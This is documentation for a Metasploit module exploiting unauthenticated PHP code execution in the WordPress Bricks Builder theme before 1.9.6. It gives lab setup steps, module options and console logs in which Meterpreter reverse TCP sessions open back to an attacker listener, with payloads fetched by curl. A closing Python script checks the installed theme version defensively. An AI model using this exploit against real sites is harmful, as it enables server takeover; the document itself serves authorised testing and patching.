## Vulnerable Application

This Metasploit module exploits a Remote Code Execution vulnerability in Bricks Builder Theme, versions prior to 1.9.6. The vulnerability allows attackers to execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication and exploit the `eval()` function usage within the theme.

To replicate a vulnerable environment for testing:

1. Install WordPress.
2. Download and install the Bricks Builder Theme, ensuring the version is below 1.9.6.
3. Activate Bricks Builder.
4. Create a model with a default page (to ensure the nonce is on `index.php`, add some elements).

## Verification Steps

1. Set up a WordPress instance with the Bricks Builder Theme (version < 1.9.6).
2. Launch `msfconsole` in your Metasploit framework.
3. Use the module: `use exploit/multi/http/wp_bricks_builder_rce`.
4. Set `RHOSTS` to the local IP address or hostname of the target.
5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
6. Execute the exploit using the `run` or `exploit` command.
7. If the target is vulnerable, the module will execute the specified payload.

## Options

No module-specific options.

## Scenarios

### Successful Exploitation Against Local WordPress with Bricks Builder Theme 1.8

**Setup**:

- Local WordPress instance with Bricks Builder Theme version 1.8.
- Metasploit Framework.

**Steps**:

1. Start `msfconsole`.
2. Load the module:
   ```
   use exploit/multi/http/wp_bricks_builder_rce
   ```
3. Set `RHOSTS` to the local IP (e.g., 192.168.1.10).
4. Configure other necessary options (`TARGETURI`, `SSL`, etc.).
5. Launch the exploit:
   ```
   exploit
   ```

**Expected Results**:

- The module attempts to retrieve a nonce from the local server.
- It then uploads and executes the payload.
- If successful, control over the local WordPress instance is gained, depending on the payload used.
**Example**:

With `cmd/linux/http/x64/meterpreter/reverse_tcp`:

```
msf6 > search bricks

Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/multi/http/wp_bricks_builder_rce  2024-02-19       excellent  Yes    Unauthenticated RCE in Bricks Builder Theme


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_bricks_builder_rce

msf6 > use 0
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_bricks_builder_rce) > options

Module options (exploit/multi/http/wp_bricks_builder_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
                                         html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to WordPress
   VHOST                       no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      ilPaBylkCKr      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
   LHOST               192.168.1.5      yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/wp_bricks_builder_rce) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf6 exploit(multi/http/wp_bricks_builder_rce) > set rhosts localhost
rhosts => localhost
msf6 exploit(multi/http/wp_bricks_builder_rce) > set rport 8888
rport => 8888
msf6 exploit(multi/http/wp_bricks_builder_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.5:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Nonce retrieved: 953563d296
[*] Sending stage (3045380 bytes) to 172.20.0.2
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.20.0.2:39856) at 2024-02-26 21:51:11 +0100

meterpreter > sysinfo
Computer     : 172.20.0.2
OS           : Debian 11.8 (Linux 6.4.10-060410-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

With `php/meterpreter/reverse_tcp`:

```
msf6 exploit(multi/http/wp_bricks_builder_rce) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_bricks_builder_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.5:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Nonce retrieved: 953563d296
[*] Sending stage (39927 bytes) to 172.20.0.2
[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 172.20.0.2:49678) at 2024-02-26 22:02:56 +0100

meterpreter > sysinfo
Computer     : 65e1e703e433
OS           : Linux 65e1e703e433 6.4.10-060410-generic #202308111154 SMP PREEMPT_DYNAMIC Fri Aug 11 12:00:45 UTC 2023 x86_64
Meterpreter  : php/linux
meterpreter >
```
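A defender-side check for the version precondition stated under Vulnerable Application (Bricks Builder below 1.9.6), added here as an example and not part of the module or its documentation: it reads the theme's `style.css` header from the web server's own disk and compares the version numerically, so that a patched 1.9.10 is not misread as older than 1.9.6. The theme directory path and the sample header are assumptions.

```python
import re
from pathlib import Path

# Constructed sample of a WordPress theme header (wp-content/themes/<theme>/style.css).
# The field values are illustrative, not taken from a real install.
SAMPLE_STYLE_CSS = """/*
Theme Name: Bricks
Theme URI: https://bricksbuilder.io/
Version: 1.9.5
*/
"""

FIXED_VERSION = (1, 9, 6)  # first release the module documentation reports as not affected


def parse_theme_version(style_css: str) -> tuple:
    """Return the 'Version:' header of a WordPress theme as a tuple of ints."""
    m = re.search(r"^\s*Version:\s*([0-9][0-9.]*)", style_css, re.MULTILINE)
    if not m:
        raise ValueError("no Version header found in style.css")
    return tuple(int(p) for p in m.group(1).strip(".").split("."))


def is_vulnerable_version(version: tuple) -> bool:
    """True when the installed version is below the fixed release.

    Tuple comparison is numeric per component, so (1, 9, 10) is correctly
    treated as newer than (1, 9, 6); a string comparison would get this wrong.
    """
    return version < FIXED_VERSION


def check_theme_dir(theme_dir) -> dict:
    """Read style.css from a theme directory and report the installed version and verdict."""
    css = Path(theme_dir, "style.css").read_text(encoding="utf-8", errors="replace")
    ver = parse_theme_version(css)
    return {"version": ".".join(map(str, ver)), "vulnerable": is_vulnerable_version(ver)}


if __name__ == "__main__":
    import sys
    # Assumed default location of the Bricks theme; override with the first argument.
    theme_dir = sys.argv[1] if len(sys.argv) > 1 else "/var/www/html/wp-content/themes/bricks"
    print(check_theme_dir(theme_dir))
```

Run it on the web server as the user that owns the WordPress files; a `vulnerable: True` result means the install matches the precondition the module checks for and should be updated to 1.9.6 or later.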